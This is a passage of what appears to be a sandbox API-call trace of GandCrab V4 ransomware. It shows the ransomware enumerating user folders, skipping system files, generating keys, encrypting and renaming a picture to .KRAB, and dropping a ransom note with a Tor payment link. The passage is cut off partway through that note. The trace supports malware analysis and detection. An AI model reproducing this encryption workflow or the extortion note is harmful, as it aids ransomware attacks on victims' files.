lpNumberOfBytesWritten=0x338f220, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338f220*=0x1f6e, lpOverlapped=0x0) returned 1 [0094.821] CloseHandle (hObject=0x320) returned 1 [0094.821] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.822] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0094.822] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x2a, wMilliseconds=0x1b)) [0094.822] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.822] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0094.823] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0094.823] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\d2ca4a08d2ca4dee3d.lock") returned 54 [0094.823] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\onedrive\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x320 [0094.824] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.824] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.825] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\") returned 31 [0094.825] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\*" [0094.825] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\*", lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0xfbd5a0 [0094.825] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.825] FindNextFileW (in: hFindFile=0xfbd5a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0094.825] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.825] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.825] FindNextFileW (in: hFindFile=0xfbd5a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0094.825] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0094.825] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0094.825] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\d2ca4a08d2ca4dee3d.lock" [0094.825] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0094.825] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 59 [0094.826] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\d2ca4a08d2ca4dee3d.lock") returned 54 [0094.826] lstrlenW (lpString=".lock") returned 5 [0094.826] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.827] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0094.827] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.827] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.827] FindNextFileW (in: hFindFile=0xfbd5a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0094.827] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0094.827] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0094.827] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\desktop.ini") returned="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\desktop.ini" [0094.827] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0094.828] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\desktop.ini.KRAB") returned 47 [0094.828] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\desktop.ini") returned 42 [0094.828] lstrlenW (lpString=".ini") returned 4 [0094.828] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.828] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".ini ") returned 5 [0094.828] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.828] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\desktop.ini") returned 42 [0094.828] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\desktop.ini") returned 42 [0094.828] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0094.829] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.829] FindNextFileW (in: hFindFile=0xfbd5a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0094.829] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0094.829] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0094.829] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\KRAB-DECRYPT.txt" [0094.829] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0094.829] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\KRAB-DECRYPT.txt.KRAB") returned 52 [0094.829] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\KRAB-DECRYPT.txt") returned 47 [0094.829] lstrlenW (lpString=".txt") returned 4 [0094.829] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.830] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0094.830] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.830] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\KRAB-DECRYPT.txt") returned 47 [0094.830] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\KRAB-DECRYPT.txt") returned 47 [0094.830] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0094.830] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0094.830] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0094.830] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0094.830] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0094.830] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0094.830] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0094.830] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0094.830] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0094.830] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0094.830] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.831] FindNextFileW (in: hFindFile=0xfbd5a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0 [0094.831] FindClose (in: hFindFile=0xfbd5a0 | out: hFindFile=0xfbd5a0) returned 1 [0094.831] CloseHandle (hObject=0x320) returned 1 [0094.831] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0094.831] lstrcmpW (lpString1="Pictures", lpString2=".") returned 1 [0094.831] lstrcmpW (lpString1="Pictures", lpString2="..") returned 1 [0094.831] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="Pictures" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures" [0094.831] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\" [0094.831] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0094.832] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0094.832] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0094.832] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0094.832] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0094.832] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.832] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0094.832] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\\\KRAB-DECRYPT.txt") returned 48 [0094.832] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0094.833] GetLastError () returned 0x50 [0094.833] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.833] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0094.833] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x2a, wMilliseconds=0x1b)) [0094.833] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.834] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0094.834] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0094.834] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\d2ca4a08d2ca4dee3d.lock") returned 54 [0094.834] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x320 [0094.834] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.835] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.835] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\") returned 31 [0094.835] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\*" [0094.835] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\*", lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0xfbd920 [0094.835] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.835] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0094.835] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.835] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.835] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0094.835] lstrcmpW (lpString1="0JkHCwq2jkp.gif", lpString2=".") returned 1 [0094.835] lstrcmpW (lpString1="0JkHCwq2jkp.gif", lpString2="..") returned 1 [0094.836] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\", lpString2="0JkHCwq2jkp.gif" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\0JkHCwq2jkp.gif") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\0JkHCwq2jkp.gif" [0094.836] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0094.836] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\0JkHCwq2jkp.gif.KRAB") returned 51 [0094.836] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\0JkHCwq2jkp.gif") returned 46 [0094.836] lstrlenW (lpString=".gif") returned 4 [0094.836] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.836] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".gif ") returned 5 [0094.837] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.837] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\0JkHCwq2jkp.gif") returned 46 [0094.837] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\0JkHCwq2jkp.gif") returned 46 [0094.837] lstrcmpiW (lpString1="0JkHCwq2jkp.gif", lpString2="desktop.ini") returned -1 [0094.837] lstrcmpiW (lpString1="0JkHCwq2jkp.gif", lpString2="autorun.inf") returned -1 [0094.837] lstrcmpiW (lpString1="0JkHCwq2jkp.gif", lpString2="ntuser.dat") returned -1 [0094.837] lstrcmpiW (lpString1="0JkHCwq2jkp.gif", lpString2="iconcache.db") returned -1 [0094.837] lstrcmpiW (lpString1="0JkHCwq2jkp.gif", lpString2="bootsect.bak") returned -1 [0094.837] lstrcmpiW (lpString1="0JkHCwq2jkp.gif", lpString2="boot.ini") returned -1 [0094.837] lstrcmpiW (lpString1="0JkHCwq2jkp.gif", lpString2="ntuser.dat.log") returned -1 [0094.837] lstrcmpiW (lpString1="0JkHCwq2jkp.gif", lpString2="thumbs.db") returned -1 [0094.837] lstrcmpiW (lpString1="0JkHCwq2jkp.gif", lpString2="KRAB-DECRYPT.html") returned -1 [0094.837] lstrcmpiW (lpString1="0JkHCwq2jkp.gif", lpString2="KRAB-DECRYPT.txt") returned -1 [0094.837] lstrcmpiW (lpString1="0JkHCwq2jkp.gif", lpString2="CRAB-DECRYPT.txt") returned -1 [0094.837] lstrcmpiW (lpString1="0JkHCwq2jkp.gif", lpString2="ntldr") returned -1 [0094.837] lstrcmpiW (lpString1="0JkHCwq2jkp.gif", lpString2="NTDETECT.COM") returned -1 [0094.837] lstrcmpiW (lpString1="0JkHCwq2jkp.gif", lpString2="Bootfont.bin") returned -1 [0094.837] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.838] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010df8) returned 1 [0094.838] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0094.839] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0094.839] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0094.839] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0094.839] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0094.839] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.839] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010df8) returned 1 [0094.840] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0094.840] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0094.840] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0094.840] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0094.840] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0094.840] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.841] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011898) returned 1 [0094.841] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd3e0) returned 1 [0094.841] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0094.841] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0094.842] GetLastError () returned 0x0 [0094.842] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0094.842] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0094.842] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011458) returned 1 [0094.842] CryptImportKey (in: hProv=0x1011458, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd3e0) returned 1 [0094.842] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0094.842] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0094.844] GetLastError () returned 0x0 [0094.844] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0094.844] CryptReleaseContext (hProv=0x1011458, dwFlags=0x0) returned 1 [0094.844] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\0JkHCwq2jkp.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\0jkhcwq2jkp.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0094.845] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0094.845] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0094.845] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0xd7d, lpOverlapped=0x0) returned 1 [0094.860] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffff283, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.860] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xd7d, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0xd7d, lpOverlapped=0x0) returned 1 [0094.860] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0094.860] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.881] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.881] CloseHandle (hObject=0x434) returned 1 [0094.881] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.882] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\0JkHCwq2jkp.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\0jkhcwq2jkp.gif"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\0JkHCwq2jkp.gif.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\0jkhcwq2jkp.gif.krab")) returned 1 [0094.883] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.883] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0094.883] lstrcmpW (lpString1="Camera Roll", lpString2=".") returned 1 [0094.883] lstrcmpW (lpString1="Camera Roll", lpString2="..") returned 1 [0094.883] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\", lpString2="Camera Roll" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll" [0094.883] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\" [0094.883] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0094.884] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0094.884] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0094.884] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0094.884] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0094.884] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.884] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0094.884] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\\\KRAB-DECRYPT.txt") returned 60 [0094.885] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\camera roll\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0094.886] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB 